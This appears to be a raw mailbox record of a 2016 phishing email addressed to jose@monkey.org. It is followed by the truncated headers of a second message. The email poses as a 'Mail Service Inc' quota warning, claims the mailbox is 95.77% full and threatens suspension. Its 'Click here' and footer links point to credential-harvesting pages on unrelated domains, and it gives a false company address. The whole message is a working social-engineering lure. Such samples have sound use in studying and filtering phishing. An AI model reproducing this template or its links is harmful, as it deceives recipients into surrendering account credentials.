From: "Mails Service Inc" <info@moto-albania.com>
Subject: verification needed for jose@monkey.org
To: jose@monkey.org
Content-Type: multipart/alternative; boundary="dqGd6QsUE3I3kviycJek=_otckbRB55yxy0"
MIME-Version: 1.0
Date: Wed, 11 May 2016 18:50:20 +0200
Return-Path: info@moto-albania.com
Message-ID: <IP-8-44VRvRQ8n0lfEm0000b466@IP-8-44.dataclub.biz>
X-OriginalArrivalTime: 11 May 2016 16:50:20.0937 (UTC) FILETIME=[34826790:01D1ABA5]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 210

This is a multi-part message in MIME format

--dqGd6QsUE3I3kviycJek=_otckbRB55yxy0
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

 - This mail is in HTML. Some elements may be ommited in plain text. -

Your mailbox is almost full.
Dear jose@monkey.org,
95.77%MB

(1938.43/2024.00 Megs)
This mailbox jose@monkey.org is full or very close to full.
This mailbox is currently 95.77% (1938.43/2024.00 Megs) full.
Click here
and
automatically verify your email ID now and avoid account suspension an=
d get 1000Megs free storage space.
Your account will be blocked from sending and receiving emails if you =
do not verify within 5days.
Thank You
Mail Service Inc
This notification was sent to
jose@monkey.org
; Don't want occasional updates about subscription preferences and fri=
endly suggestions?
Change
what email + sends you.
Mail Service Inc., 1600 Amphitheatre Pkwy, Mountain View, CA 94043 USA

--dqGd6QsUE3I3kviycJek=_otckbRB55yxy0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD>
<BODY>
<DIV><SPAN style=3D"FONT-SIZE: medium; FONT-FAMILY: Arial; COLOR: #000=
066"><STRONG>
<DIV id=3Dyui_3_16_0_1_1415024814852_2077 style=3D"MARGIN-BOTTOM: 14pt=
; MARGIN-TOP: 14pt"><FONT color=3D#000000><SPAN id=3Dyui_3_16_0_1_1415=
024814852_2095 style=3D"FONT-SIZE: medium; COLOR: #000066; FONT-: Aria=
l">Your mailbox is almost full.</SPAN><BR><BR><SPAN id=3Dyui_3_16_0_1_=
1415024814852_2090 style=3D"FONT-SIZE: small; COLOR: black; FONT-: Tah=
oma">Dear jose@monkey.org,&nbsp; </SPAN></FONT></DIV>
<DIV style=3D"MARGIN-BOTTOM: 14pt; MARGIN-TOP: 14pt">
<TABLE id=3Dyui_3_16_0_1_1415024814852_2086 cellSpacing=3D0>
<TBODY id=3Dyui_3_16_0_1_1415024814852_2085>
<TR id=3Dyui_3_16_0_1_1415024814852_2084>
<TD id=3Dyui_3_16_0_1_1415024814852_2088 style=3D"BORDER-TOP: black 1p=
x solid; BORDER-RIGHT-WIDTH: 1px; WIDTH: 187px; BORDER-BOTTOM: black 1=
px solid; BORDER-LEFT: black 1px solid; BORDER-RIGHT-COLOR: black; BAC=
KGROUND-COLOR: #ffcc00" width=3D187><SPAN id=3Dyui_3_16_0_1_1415024814=
852_2417 style=3D"BACKGROUND-COLOR: #ffcc00"><SPAN id=3Dyui_3_16_0_1_1=
415024814852_2416 style=3D"FONT-SIZE: small; COLOR: black">95.77%MB</S=
PAN></SPAN></TD>
<TD id=3Dyui_3_16_0_1_1415024814852_2087 style=3D"BORDER-LEFT-WIDTH: 1=
px; BORDER-TOP: black 1px solid; BORDER-RIGHT: black 1px solid; WIDTH:=
 13px; BORDER-BOTTOM: black 1px solid; BORDER-LEFT-COLOR: black; BACKG=
ROUND-COLOR: white" width=3D13><SPAN id=3Dyui_3_16_0_1_1415024814852_2=
415 style=3D"BACKGROUND-COLOR: white">&nbsp;</SPAN></TD>
<TD id=3Dyui_3_16_0_1_1415024814852_2083><SPAN id=3Dyui_3_16_0_1_14150=
24814852_2082 style=3D"FONT-SIZE: small; COLOR: black"><STRONG id=3Dyu=
i_3_16_0_1_1415024814852_2081>(1938.43/2024.00 Megs) </STRONG></SPAN><=
/TD></TR></TBODY></TABLE></DIV>
<DIV style=3D"MARGIN-BOTTOM: 14pt; MARGIN-TOP: 14pt"></STRONG></SPAN><=
SPAN style=3D"FONT-SIZE: small; FONT-FAMILY: Tahoma; COLOR: black"><SP=
AN id=3Dyui_3_16_0_1_1415024814852_2221 style=3D"FONT-SIZE: small; FON=
T-FAMILY: Tahoma; COLOR: black">This mailbox&nbsp;jose@monkey.org is f=
ull or very close to full.</SPAN></DIV>
<DIV style=3D"MARGIN-BOTTOM: 14pt; MARGIN-TOP: 14pt">
<DIV id=3Dyui_3_16_0_1_1415024814852_2224 style=3D"MARGIN-BOTTOM: 14pt=
; MARGIN-TOP: 14pt"><SPAN id=3Dyui_3_16_0_1_1415024814852_2223 style=
=3D"FONT-SIZE: small; COLOR: black; FONT-: Tahoma">This mailbox is cur=
rently 95.77% (1938.43/2024.00 Megs) full.</SPAN></DIV>
<DIV id=3Dyui_3_16_0_1_1415024814852_2225 style=3D"MARGIN-BOTTOM: 14pt=
; MARGIN-TOP: 14pt"></SPAN><SPAN style=3D"FONT-SIZE: small; FONT-FAMIL=
Y: Tahoma; COLOR: black"><SPAN id=3Dyui_3_16_0_1_1420921215864_7037 st=
yle=3D"FONT-SIZE: small; FONT-FAMILY: Tahoma; COLOR: black"><A href=3D=
"http://arsoculorum.pl/css/?email=3Djose@monkey.org">Click here</A>&nb=
sp;and <SPAN id=3Dyui_3_16_0_1_1420921215864_7037 style=3D"FONT-SIZE: =
small; FONT-FAMILY: Tahoma; COLOR: black">automatically verify your em=
ail ID now and avoid account suspension and get 1000Megs free storage =
space.</SPAN></SPAN></SPAN></DIV>
<DIV style=3D"MARGIN-BOTTOM: 14pt; MARGIN-TOP: 14pt"><SPAN style=3D"FO=
NT-SIZE: small; FONT-FAMILY: Tahoma; COLOR: black"><SPAN style=3D"FONT=
-SIZE: small; FONT-FAMILY: Tahoma; COLOR: black"><SPAN style=3D"FONT-S=
IZE: small; FONT-FAMILY: Tahoma; COLOR: black">Your account will be bl=
ocked from sending and receiving emails if you do not verify within 5d=
ays.</SPAN></SPAN></SPAN><SPAN style=3D"FONT-FAMILY: Tahoma; COLOR: bl=
ack; FONT-: small"></SPAN><B><SPAN style=3D"COLOR: black"></SPAN></B><=
SPAN style=3D"COLOR: #333333"><SPAN id=3Dyui_3_16_0_1_1415024814852_23=
06 style=3D"FONT-SIZE: small; FONT-FAMILY: Tahoma; COLOR: black"></SPA=
N></SPAN></DIV>
<DIV style=3D"MARGIN-BOTTOM: 14pt; MARGIN-TOP: 14pt"><SPAN style=3D"CO=
LOR: #333333"><SPAN style=3D"FONT-SIZE: small; FONT-FAMILY: Tahoma; CO=
LOR: black"></SPAN><SPAN id=3Dyui_3_16_0_1_1415024814852_2314 style=3D=
"FONT-SIZE: small; COLOR: black; FONT-: Tahoma">Thank You</SPAN></DIV>=
</DIV></DIV>
<DIV style=3D"MARGIN-BOTTOM: 0pt; BACKGROUND: white; LINE-HEIGHT: 14.4=
pt">
<DIV style=3D"MARGIN-BOTTOM: 14pt; MARGIN-TOP: 14pt"><SPAN style=3D"FO=
NT-SIZE: small; COLOR: black; FONT-: Tahoma">Mail Service Inc</SPAN></=
SPAN></DIV></DIV>
<DIV style=3D"MARGIN-BOTTOM: 10px; FONT-SIZE: 10px; COLOR: gray">
<DIV>This notification was sent to <A href=3D"http://saxumpropertieslt=
d.com/MailService/kent/index.php?email=3D%0%&amp;.rand=3D13vqcr8bp0gud=
&amp;lc=3D1033&amp;id=3D64855&amp;mkt=3Den-us&amp;cbcxt=3Dmai&amp;snsc=
=3D1" target=3D_blank>jose@monkey.org</A>; Don't want occasional updat=
es about subscription preferences and friendly suggestions? <A style=
=3D"TEXT-DECORATION: none; COLOR: #3366cc" href=3D"http://saxumpropert=
iesltd.com/MailService/kent/index.php?email=3D%0%&amp;.rand=3D13vqcr8b=
p0gud&amp;lc=3D1033&amp;id=3D64855&amp;mkt=3Den-us&amp;cbcxt=3Dmai&amp=
;snsc=3D1" target=3D_blank>Change</A> what email + sends you.</DIV>
<DIV>Mail Service&nbsp;Inc., 1600 Amphitheatre Pkwy, Mountain View, CA=
 94043 USA</DIV></DIV></BODY></HTML>

--dqGd6QsUE3I3kviycJek=_otckbRB55yxy0--


From jose@monkey.org Wed May 11 20:49:47 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 71503952814.02.eye81_711c5ee566d21
X-Spam-Summary: 75,0,0,073c7527594a3bae,d41d8cd98f00b204,codewizard@approject.com,:,RULES_HIT:41:72:327:355:379:455:800:871:967:973:978:983:988:989:1000:1001:1189:1197:1208:1260:1263:1308:1309:1313:1314:1345:1381:1390:1431:1432:1433:1434:1437:1516:1517:1545:1573:1575:1594:1685:1699:1730:1744:1747:1777:1792:1801:1803:2107:2194:2196:2198:2199:2200:2201:2393:2525:2527:2528:2568:2610:2632:2636:2682:2685:2737:2741:2859:2890:2891:2892:2894:2895:2896:2903:2914:2916:2917:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:2975:3000:3022:3138:3139:3140:3141:3142:3148:3154:3353:3552:3554:3770:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4093:4242:4321:4365:4605:4700:6248:6261:6354:6506:6650:6669:6678:6747:7208:7266:7281:7398:7774:7809:7903:7909:8516:8518:8550:8568:8599:8603:8957:9025:9060:9074:9080:9121:9130:9177:9388:9908:10004:10030:10049:10346:11233:11473:11658:11914:12043:12438:12555:12679:12729:12737:12740:12776:12812:12963:12973:1
X-HE-Tag: eye81_711c5ee566d21
X-Filterd-Recvd-Size: 43850
Received: from approject.com (unknown [187.11.175.67])
	by imf18.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 11 May 2016 20:46:54 +0000 (UTC)
